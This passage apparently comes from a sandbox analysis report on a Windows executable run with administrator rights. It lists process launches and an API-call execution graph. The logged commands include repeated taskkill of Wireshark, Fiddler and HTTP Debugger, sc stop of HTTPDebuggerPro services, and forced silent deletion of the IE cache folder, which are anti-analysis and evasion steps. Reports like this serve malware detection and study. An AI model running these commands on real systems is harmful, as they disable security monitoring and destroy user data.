                                          File size:101'376 bytes
                                          MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:16
                                          Start time:15:10:00
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:17
                                          Start time:15:10:00
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\taskkill.exe
                                          Wow64 process (32bit):false
                                          Commandline:taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
                                          Imagebase:0x7ff6130f0000
                                          File size:101'376 bytes
                                          MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:18
                                          Start time:15:10:01
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:19
                                          Start time:15:10:01
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\taskkill.exe
                                          Wow64 process (32bit):false
                                          Commandline:taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                          Imagebase:0x7ff6130f0000
                                          File size:101'376 bytes
                                          MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:20
                                          Start time:15:10:01
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:21
                                          Start time:15:10:01
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc stop HTTPDebuggerPro
                                          Imagebase:0x7ff656ab0000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:22
                                          Start time:15:10:01
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:23
                                          Start time:15:10:01
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc stop HTTPDebuggerProSdk
                                          Imagebase:0x7ff656ab0000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:24
                                          Start time:15:10:01
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:25
                                          Start time:15:10:04
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:26
                                          Start time:15:10:04
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\taskkill.exe
                                          Wow64 process (32bit):false
                                          Commandline:taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                          Imagebase:0x7ff6130f0000
                                          File size:101'376 bytes
                                          MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:27
                                          Start time:15:10:04
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:28
                                          Start time:15:10:04
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\taskkill.exe
                                          Wow64 process (32bit):false
                                          Commandline:taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T
                                          Imagebase:0x7ff6130f0000
                                          File size:101'376 bytes
                                          MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:29
                                          Start time:15:10:05
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:30
                                          Start time:15:10:05
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\taskkill.exe
                                          Wow64 process (32bit):false
                                          Commandline:taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                          Imagebase:0x7ff6130f0000
                                          File size:101'376 bytes
                                          MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:31
                                          Start time:15:10:05
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:32
                                          Start time:15:10:05
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc stop HTTPDebuggerPro
                                          Imagebase:0x7ff656ab0000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:33
                                          Start time:15:10:05
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerProSdk >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:34
                                          Start time:15:10:06
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\sc.exe
                                          Wow64 process (32bit):false
                                          Commandline:sc stop HTTPDebuggerProSdk
                                          Imagebase:0x7ff656ab0000
                                          File size:72'192 bytes
                                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:35
                                          Start time:15:10:06
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\cmd.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\cmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&1
                                          Imagebase:0x7ff6d42e0000
                                          File size:289'792 bytes
                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:38
                                          Start time:15:10:06
                                          Start date:20/10/2024
                                          Path:C:\Windows\System32\WerFault.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 2640 -s 992
                                          Imagebase:0x7ff627b90000
                                          File size:570'736 bytes
                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:4.2%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:24.5%
                                            Total number of Nodes:2000
                                            Total number of Limit Nodes:87
                                            execution_graph 47460 7ff7e59fb1a0 47479 7ff7e5a08e80 47460->47479 47465 7ff7e59fb21d EnterCriticalSection 47469 7ff7e59fb22c LeaveCriticalSection 47465->47469 47470 7ff7e59fb248 47465->47470 47466 7ff7e59fb1fb WSAGetLastError 47467 7ff7e59fb205 WSAGetLastError 47466->47467 47468 7ff7e59fb21a 47466->47468 47467->47465 47468->47465 47500 7ff7e59fb130 7 API calls 47469->47500 47472 7ff7e59fb276 LeaveCriticalSection 47470->47472 47473 7ff7e59fb252 send 47470->47473 47476 7ff7e59fb286 47472->47476 47473->47472 47475 7ff7e59fb26d WSAGetLastError 47473->47475 47474 7ff7e59fb23d free 47474->47476 47475->47472 47501 7ff7e5a3f580 47476->47501 47510 7ff7e5a09840 13 API calls 47479->47510 47481 7ff7e59fb1df 47482 7ff7e5a186d0 getaddrinfo 47481->47482 47483 7ff7e5a18703 47482->47483 47493 7ff7e59fb1f5 47482->47493 47484 7ff7e5a18874 WSASetLastError 47483->47484 47485 7ff7e5a187ee 47483->47485 47486 7ff7e5a18759 malloc 47483->47486 47484->47493 47487 7ff7e5a18837 47485->47487 47488 7ff7e5a18831 freeaddrinfo 47485->47488 47489 7ff7e5a1881c 47486->47489 47490 7ff7e5a18770 malloc 47486->47490 47491 7ff7e5a1883c 47487->47491 47492 7ff7e5a1886f 47487->47492 47488->47487 47489->47485 47495 7ff7e5a187a7 memcpy 47490->47495 47496 7ff7e5a1880b free 47490->47496 47491->47493 47494 7ff7e5a18841 free free free 47491->47494 47492->47484 47492->47493 47493->47465 47493->47466 47494->47493 47494->47494 47497 7ff7e5a187ce 47495->47497 47498 7ff7e5a187bf _strdup 47495->47498 47496->47485 47497->47483 47498->47497 47499 7ff7e5a187f0 free free 47498->47499 47499->47485 47500->47474 47502 7ff7e5a3f589 47501->47502 47503 7ff7e59fb295 47502->47503 47504 7ff7e5a3fa28 IsProcessorFeaturePresent 47502->47504 47505 7ff7e5a3fa40 47504->47505 47511 7ff7e5a3fc1c RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 47505->47511 47507 7ff7e5a3fa53 47512 7ff7e5a3f9f4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47507->47512 47510->47481 47511->47507 47513 7ff7e5a220b0 47514 7ff7e5a220d9 47513->47514 47515 7ff7e5a22140 47513->47515 47517 7ff7e5a220ea 47514->47517 47518 7ff7e5a22100 47514->47518 47588 7ff7e5a0b6d0 47515->47588 47586 7ff7e5a0b5d0 454 API calls 47517->47586 47548 7ff7e5a06980 47518->47548 47521 7ff7e5a2214d 47528 7ff7e5a221b1 47521->47528 47534 7ff7e5a2222a 47521->47534 47608 7ff7e5a3aa80 35 API calls 47521->47608 47522 7ff7e5a220f5 47524 7ff7e5a22111 47524->47534 47587 7ff7e5a22d30 65 API calls 47524->47587 47526 7ff7e5a222de 47616 7ff7e5a0c9a0 17 API calls 47526->47616 47527 7ff7e5a221e2 47529 7ff7e5a2223e 47527->47529 47530 7ff7e5a221ee 47527->47530 47528->47526 47528->47527 47528->47534 47543 7ff7e5a22247 47529->47543 47612 7ff7e5a3cb10 _errno strtoll _errno 47529->47612 47609 7ff7e5a22a40 320 API calls 47530->47609 47535 7ff7e5a22135 47537 7ff7e5a221f8 47537->47534 47610 7ff7e5a22590 26 API calls 47537->47610 47539 7ff7e5a2229e 47539->47534 47615 7ff7e5a3aa80 35 API calls 47539->47615 47542 7ff7e5a22263 47542->47539 47542->47543 47545 7ff7e5a22289 47542->47545 47543->47539 47614 7ff7e5a22dd0 72 API calls 47543->47614 47544 7ff7e5a22213 47544->47534 47611 7ff7e5a22980 32 API calls 47544->47611 47613 7ff7e5a22dd0 72 API calls 47545->47613 47549 7ff7e5a069d8 47548->47549 47559 7ff7e5a069cf 47548->47559 47617 7ff7e5a0d7b0 47549->47617 47551 7ff7e5a3f580 8 API calls 47552 7ff7e5a06f05 47551->47552 47552->47515 47552->47524 47553 7ff7e5a069f2 47554 7ff7e5a06a82 47553->47554 47555 7ff7e5a06a69 47553->47555 47557 7ff7e5a06a8c 47554->47557 47584 7ff7e5a06ab9 47554->47584 47665 7ff7e5a05970 19 API calls 47555->47665 47558 7ff7e5a07b50 660 API calls 47557->47558 47560 7ff7e5a06a9a 47558->47560 47559->47551 47560->47559 47563 7ff7e5a07c60 51 API calls 47560->47563 47562 7ff7e5a06d95 47562->47559 47667 7ff7e5a08280 665 API calls 47562->47667 47563->47559 47564 7ff7e5a06d04 SleepEx getsockopt 47566 7ff7e5a06d4c WSAGetLastError 47564->47566 47564->47584 47566->47584 47567 7ff7e5a06ca6 SleepEx getsockopt 47570 7ff7e5a06cee WSAGetLastError 47567->47570 47567->47584 47568 7ff7e5a06bb7 WSASetLastError 47568->47584 47569 7ff7e5a05af0 15 API calls 47569->47584 47570->47584 47571 7ff7e5a06dc7 47676 7ff7e59f2500 27 API calls 47571->47676 47572 7ff7e5a06dd3 47574 7ff7e5a06e2b 47572->47574 47668 7ff7e5a065d0 47572->47668 47573 7ff7e5a06dae 47573->47559 47573->47571 47644 7ff7e5a07b50 47574->47644 47578 7ff7e5a06e49 47578->47559 47657 7ff7e5a07c60 47578->47657 47579 7ff7e5a06ea7 47677 7ff7e5a05970 19 API calls 47579->47677 47582 7ff7e5a06a78 47582->47559 47584->47562 47584->47564 47584->47567 47584->47568 47584->47569 47584->47572 47585 7ff7e5a08280 665 API calls 47584->47585 47620 7ff7e5a15fe0 47584->47620 47666 7ff7e59f2500 27 API calls 47584->47666 47585->47584 47586->47522 47587->47535 47589 7ff7e5a0b704 47588->47589 47590 7ff7e5a0b71f 47588->47590 47589->47590 47727 7ff7e59ffb70 47589->47727 47591 7ff7e5a0b761 memset 47590->47591 47594 7ff7e5a0b725 47590->47594 47596 7ff7e5a0b793 47591->47596 47593 7ff7e5a3f580 8 API calls 47595 7ff7e5a0b8c5 47593->47595 47594->47593 47595->47521 47597 7ff7e5a0b7ee calloc 47596->47597 47598 7ff7e5a0b866 47596->47598 47600 7ff7e5a0b81c 47597->47600 47601 7ff7e5a0b806 47597->47601 47751 7ff7e5a0aa80 453 API calls 47598->47751 47741 7ff7e5a05af0 47600->47741 47601->47594 47603 7ff7e5a0b876 47605 7ff7e5a05af0 15 API calls 47603->47605 47606 7ff7e5a0b891 47603->47606 47605->47606 47606->47594 47607 7ff7e5a0b89b free 47606->47607 47607->47594 47608->47528 47609->47537 47610->47544 47611->47534 47612->47542 47613->47539 47614->47539 47615->47534 47616->47534 47618 7ff7e5a0d7fd GetTickCount 47617->47618 47619 7ff7e5a0d7c2 QueryPerformanceCounter 47617->47619 47618->47553 47619->47553 47621 7ff7e5a16027 47620->47621 47625 7ff7e5a1605b 47620->47625 47622 7ff7e5a16031 47621->47622 47621->47625 47623 7ff7e5a16038 WSASetLastError 47622->47623 47624 7ff7e5a1604b Sleep 47622->47624 47643 7ff7e5a16054 47622->47643 47623->47643 47624->47643 47627 7ff7e5a161a5 47625->47627 47631 7ff7e5a161d3 select 47625->47631 47626 7ff7e5a3f580 8 API calls 47629 7ff7e5a1630e 47626->47629 47630 7ff7e5a161aa 47627->47630 47632 7ff7e5a161b3 WSASetLastError 47627->47632 47633 7ff7e5a161c6 Sleep 47627->47633 47629->47584 47634 7ff7e5a1629c 47630->47634 47635 7ff7e5a16272 __WSAFDIsSet __WSAFDIsSet 47630->47635 47630->47643 47631->47630 47632->47630 47633->47630 47636 7ff7e5a162cb 47634->47636 47637 7ff7e5a162a4 __WSAFDIsSet 47634->47637 47635->47634 47640 7ff7e5a162d3 __WSAFDIsSet 47636->47640 47636->47643 47638 7ff7e5a162b7 47637->47638 47639 7ff7e5a162ba __WSAFDIsSet 47637->47639 47638->47639 47639->47636 47641 7ff7e5a162e9 __WSAFDIsSet 47640->47641 47642 7ff7e5a162e6 47640->47642 47641->47643 47642->47641 47643->47626 47645 7ff7e5a07c55 47644->47645 47646 7ff7e5a07b67 47644->47646 47645->47578 47647 7ff7e5a07c37 47646->47647 47648 7ff7e5a07c0a 47646->47648 47650 7ff7e5a07bec 47646->47650 47680 7ff7e5a16440 632 API calls 47647->47680 47679 7ff7e5a16a90 659 API calls 47648->47679 47650->47648 47653 7ff7e5a07bf1 47650->47653 47652 7ff7e5a07c50 47652->47578 47678 7ff7e5a05970 19 API calls 47653->47678 47654 7ff7e5a07c32 47654->47578 47656 7ff7e5a07c00 47656->47578 47658 7ff7e5a07c80 47657->47658 47659 7ff7e5a07c8d 47657->47659 47711 7ff7e5a15090 47658->47711 47681 7ff7e5a07300 47659->47681 47664 7ff7e5a07ca5 47664->47559 47665->47582 47666->47584 47667->47573 47669 7ff7e5a065e5 47668->47669 47670 7ff7e5a06610 closesocket 47668->47670 47671 7ff7e5a06601 47669->47671 47672 7ff7e5a06626 47669->47672 47670->47574 47725 7ff7e59f5b00 free 47671->47725 47726 7ff7e59f5b00 free 47672->47726 47675 7ff7e5a0662e 47675->47574 47676->47579 47677->47582 47678->47656 47679->47654 47680->47652 47682 7ff7e5a07533 47681->47682 47683 7ff7e5a07337 47681->47683 47685 7ff7e5a3f580 8 API calls 47682->47685 47683->47682 47684 7ff7e5a07351 getpeername 47683->47684 47687 7ff7e5a07376 WSAGetLastError 47684->47687 47688 7ff7e5a073ad getsockname 47684->47688 47686 7ff7e5a0761a 47685->47686 47714 7ff7e5a020a0 15 API calls 47686->47714 47715 7ff7e59f2500 27 API calls 47687->47715 47690 7ff7e5a07400 WSAGetLastError 47688->47690 47691 7ff7e5a07437 47688->47691 47717 7ff7e59f2500 27 API calls 47690->47717 47719 7ff7e5a06530 19 API calls 47691->47719 47692 7ff7e5a07393 47716 7ff7e5a05970 19 API calls 47692->47716 47696 7ff7e5a0741d 47718 7ff7e5a05970 19 API calls 47696->47718 47697 7ff7e5a07459 47698 7ff7e5a0749d 47697->47698 47699 7ff7e5a0745d _errno _errno 47697->47699 47722 7ff7e5a06530 19 API calls 47698->47722 47720 7ff7e59f2500 27 API calls 47699->47720 47700 7ff7e5a073a8 47700->47682 47704 7ff7e5a07483 47721 7ff7e5a05970 19 API calls 47704->47721 47705 7ff7e5a074ef 47705->47682 47707 7ff7e5a074f3 _errno _errno 47705->47707 47723 7ff7e59f2500 27 API calls 47707->47723 47709 7ff7e5a07519 47724 7ff7e5a05970 19 API calls 47709->47724 47712 7ff7e5a0d7b0 2 API calls 47711->47712 47713 7ff7e5a150aa 47712->47713 47713->47659 47714->47664 47715->47692 47716->47700 47717->47696 47718->47700 47719->47697 47720->47704 47721->47700 47722->47705 47723->47709 47724->47700 47725->47670 47726->47675 47728 7ff7e59ffb9e 47727->47728 47729 7ff7e59ffb97 47727->47729 47731 7ff7e59ffbc4 47728->47731 47732 7ff7e59ffbcd 47728->47732 47734 7ff7e59ffc07 47728->47734 47864 7ff7e5a00550 memset 47729->47864 47865 7ff7e5a05970 19 API calls 47731->47865 47752 7ff7e5a19430 strchr 47732->47752 47828 7ff7e5a18df0 47732->47828 47846 7ff7e5a19a80 47732->47846 47734->47590 47735 7ff7e59ffbf2 47735->47734 47737 7ff7e5a15090 2 API calls 47735->47737 47736 7ff7e59ffc17 47736->47734 47737->47734 47742 7ff7e5a05af9 47741->47742 47745 7ff7e5a05c4e 47741->47745 47750 7ff7e5a05bc9 47742->47750 48088 7ff7e5a08f80 13 API calls 47742->48088 47744 7ff7e5a3f580 8 API calls 47744->47745 47745->47598 47746 7ff7e5a05bb1 47748 7ff7e5a05bfe fwrite fwrite 47746->47748 47746->47750 47747 7ff7e5a05b4c 47747->47746 47749 7ff7e5a08e80 13 API calls 47747->47749 47748->47750 47749->47746 47750->47744 47751->47603 47753 7ff7e5a19470 47752->47753 47754 7ff7e5a194ca strncpy 47753->47754 47755 7ff7e5a19479 strncpy 47753->47755 47758 7ff7e5a194c5 47753->47758 47757 7ff7e5a194da strcmp 47754->47757 47759 7ff7e5a19a6c 47755->47759 47760 7ff7e5a194c3 47755->47760 47761 7ff7e5a194fd strcmp 47757->47761 47776 7ff7e5a194f3 47757->47776 47758->47754 47866 7ff7e5a3fafc 47759->47866 47760->47757 47763 7ff7e5a1951b strcmp 47761->47763 47761->47776 47766 7ff7e5a19539 strcmp 47763->47766 47763->47776 47764 7ff7e5a3f580 8 API calls 47768 7ff7e5a19a5c 47764->47768 47767 7ff7e5a19551 strcmp 47766->47767 47766->47776 47769 7ff7e5a19569 strcmp 47767->47769 47767->47776 47768->47735 47770 7ff7e5a19587 strcmp 47769->47770 47769->47776 47773 7ff7e5a195a5 strcmp 47770->47773 47770->47776 47773->47776 47777 7ff7e5a195c3 strcmp 47773->47777 47776->47764 47777->47776 47781 7ff7e5a195e1 strcmp 47777->47781 47781->47776 47784 7ff7e5a195ff strcmp 47781->47784 47784->47776 47787 7ff7e5a1961d strcmp 47784->47787 47787->47776 47788 7ff7e5a1963b strcmp 47787->47788 47788->47776 47789 7ff7e5a19659 strcmp 47788->47789 47789->47776 47792 7ff7e5a19677 strcmp 47789->47792 47792->47776 47795 7ff7e5a19695 strcmp 47792->47795 47795->47776 47797 7ff7e5a196b3 strcmp 47795->47797 47797->47776 47798 7ff7e5a196d1 strcmp 47797->47798 47798->47776 47799 7ff7e5a196ef strcmp 47798->47799 47799->47776 47800 7ff7e5a1970d strcmp 47799->47800 47800->47776 47801 7ff7e5a1972b strcmp 47800->47801 47801->47776 47802 7ff7e5a19749 strcmp 47801->47802 47802->47776 47803 7ff7e5a19767 strcmp 47802->47803 47803->47776 47804 7ff7e5a19785 strcmp 47803->47804 47804->47776 47805 7ff7e5a197a3 strcmp 47804->47805 47805->47776 47806 7ff7e5a197c1 strcmp 47805->47806 47806->47776 47807 7ff7e5a197df strcmp 47806->47807 47807->47776 47808 7ff7e5a197fd strcmp 47807->47808 47808->47776 47809 7ff7e5a1981b strcmp 47808->47809 47809->47776 47810 7ff7e5a19839 strcmp 47809->47810 47810->47776 47811 7ff7e5a19857 strcmp 47810->47811 47811->47776 47812 7ff7e5a19875 strcmp 47811->47812 47812->47776 47813 7ff7e5a19893 strcmp 47812->47813 47813->47776 47814 7ff7e5a198b1 strcmp 47813->47814 47814->47776 47815 7ff7e5a198cf strcmp 47814->47815 47815->47776 47816 7ff7e5a198ed strcmp 47815->47816 47816->47776 47817 7ff7e5a1990b strcmp 47816->47817 47817->47776 47818 7ff7e5a19929 strcmp 47817->47818 47818->47776 47819 7ff7e5a19947 strcmp 47818->47819 47819->47776 47820 7ff7e5a19965 strcmp 47819->47820 47820->47776 47821 7ff7e5a19983 strcmp 47820->47821 47821->47776 47822 7ff7e5a199a1 strcmp 47821->47822 47822->47776 47823 7ff7e5a199bf strcmp 47822->47823 47823->47776 47824 7ff7e5a199da strcmp 47823->47824 47824->47776 47825 7ff7e5a199f5 strcmp 47824->47825 47825->47776 47826 7ff7e5a19a10 strcmp 47825->47826 47826->47776 47827 7ff7e5a19a2b strcmp 47826->47827 47827->47776 47829 7ff7e5a19a80 47828->47829 47830 7ff7e5a071f0 10 API calls 47829->47830 47841 7ff7e5a19afb 47829->47841 47845 7ff7e5a19ac9 47829->47845 47832 7ff7e5a19ae7 47830->47832 47831 7ff7e5a19bf2 47831->47845 48084 7ff7e5a1b1e0 67 API calls 47831->48084 47835 7ff7e5a19bdc 47832->47835 47837 7ff7e5a19c70 74 API calls 47832->47837 47833 7ff7e5a071f0 10 API calls 47833->47841 48083 7ff7e5a05970 19 API calls 47835->48083 47837->47841 47838 7ff7e5a19bd5 47838->47845 47839 7ff7e5a15fe0 19 API calls 47839->47841 47840 7ff7e5a1aa50 303 API calls 47840->47841 47841->47831 47841->47833 47841->47835 47841->47839 47841->47840 47842 7ff7e5a19bbd WSAGetLastError 47841->47842 47843 7ff7e5a19bac 47841->47843 47841->47845 48082 7ff7e5a05970 19 API calls 47842->48082 47843->47835 47843->47845 47845->47735 47847 7ff7e5a19ad4 47846->47847 47850 7ff7e5a19ac9 47846->47850 47848 7ff7e5a071f0 10 API calls 47847->47848 47860 7ff7e5a19afb 47847->47860 47851 7ff7e5a19ae7 47848->47851 47849 7ff7e5a19bf2 47849->47850 48087 7ff7e5a1b1e0 67 API calls 47849->48087 47850->47735 47854 7ff7e5a19bdc 47851->47854 47856 7ff7e5a19c70 74 API calls 47851->47856 47852 7ff7e5a071f0 10 API calls 47852->47860 48086 7ff7e5a05970 19 API calls 47854->48086 47856->47860 47857 7ff7e5a19bd5 47857->47850 47858 7ff7e5a15fe0 19 API calls 47858->47860 47859 7ff7e5a1aa50 303 API calls 47859->47860 47860->47849 47860->47850 47860->47852 47860->47854 47860->47858 47860->47859 47861 7ff7e5a19bbd WSAGetLastError 47860->47861 47862 7ff7e5a19bac 47860->47862 48085 7ff7e5a05970 19 API calls 47861->48085 47862->47850 47862->47854 47864->47728 47865->47736 47998 7ff7e5a3fb10 IsProcessorFeaturePresent 47866->47998 47999 7ff7e5a3fb27 47998->47999 48004 7ff7e5a3fbac RtlCaptureContext RtlLookupFunctionEntry 47999->48004 48005 7ff7e5a3fb3b 48004->48005 48006 7ff7e5a3fbdc RtlVirtualUnwind 48004->48006 48007 7ff7e5a3f9f4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 48005->48007 48006->48005 48082->47838 48083->47838 48084->47845 48085->47857 48086->47857 48087->47850 48088->47747 48089 7ff7e5a11490 48090 7ff7e59ffb70 304 API calls 48089->48090 48091 7ff7e5a114a7 48090->48091 48092 7ff7e59f777b 48093 7ff7e59f778e 48092->48093 48094 7ff7e59f7847 48093->48094 48095 7ff7e5a0b6d0 456 API calls 48093->48095 48097 7ff7e59f7796 48093->48097 48096 7ff7e59f77d3 48094->48096 48094->48097 48100 7ff7e59f77cd 48095->48100 48099 7ff7e59f6d00 292 API calls 48096->48099 48112 7ff7e59f727b 48097->48112 48168 7ff7e5a0b580 free 48097->48168 48099->48112 48100->48094 48100->48096 48100->48097 48115 7ff7e5a112d0 48100->48115 48102 7ff7e59f8313 48172 7ff7e5a05970 19 API calls 48102->48172 48103 7ff7e59f84a0 17 API calls 48103->48112 48105 7ff7e59f8322 48108 7ff7e5a071f0 10 API calls 48108->48112 48109 7ff7e5a05970 19 API calls 48110 7ff7e59f731e 48109->48110 48110->48109 48110->48112 48112->48102 48112->48103 48112->48105 48112->48108 48112->48110 48133 7ff7e5a05970 19 API calls 48112->48133 48134 7ff7e59f6d00 48112->48134 48169 7ff7e5a01430 90 API calls 48112->48169 48170 7ff7e59f5a20 15 API calls 48112->48170 48171 7ff7e5a151e0 22 API calls 48112->48171 48116 7ff7e5a112fc 48115->48116 48117 7ff7e5a0b6d0 456 API calls 48116->48117 48120 7ff7e5a11306 48117->48120 48118 7ff7e5a3f580 8 API calls 48119 7ff7e5a11462 48118->48119 48119->48094 48121 7ff7e5a1141c 48120->48121 48122 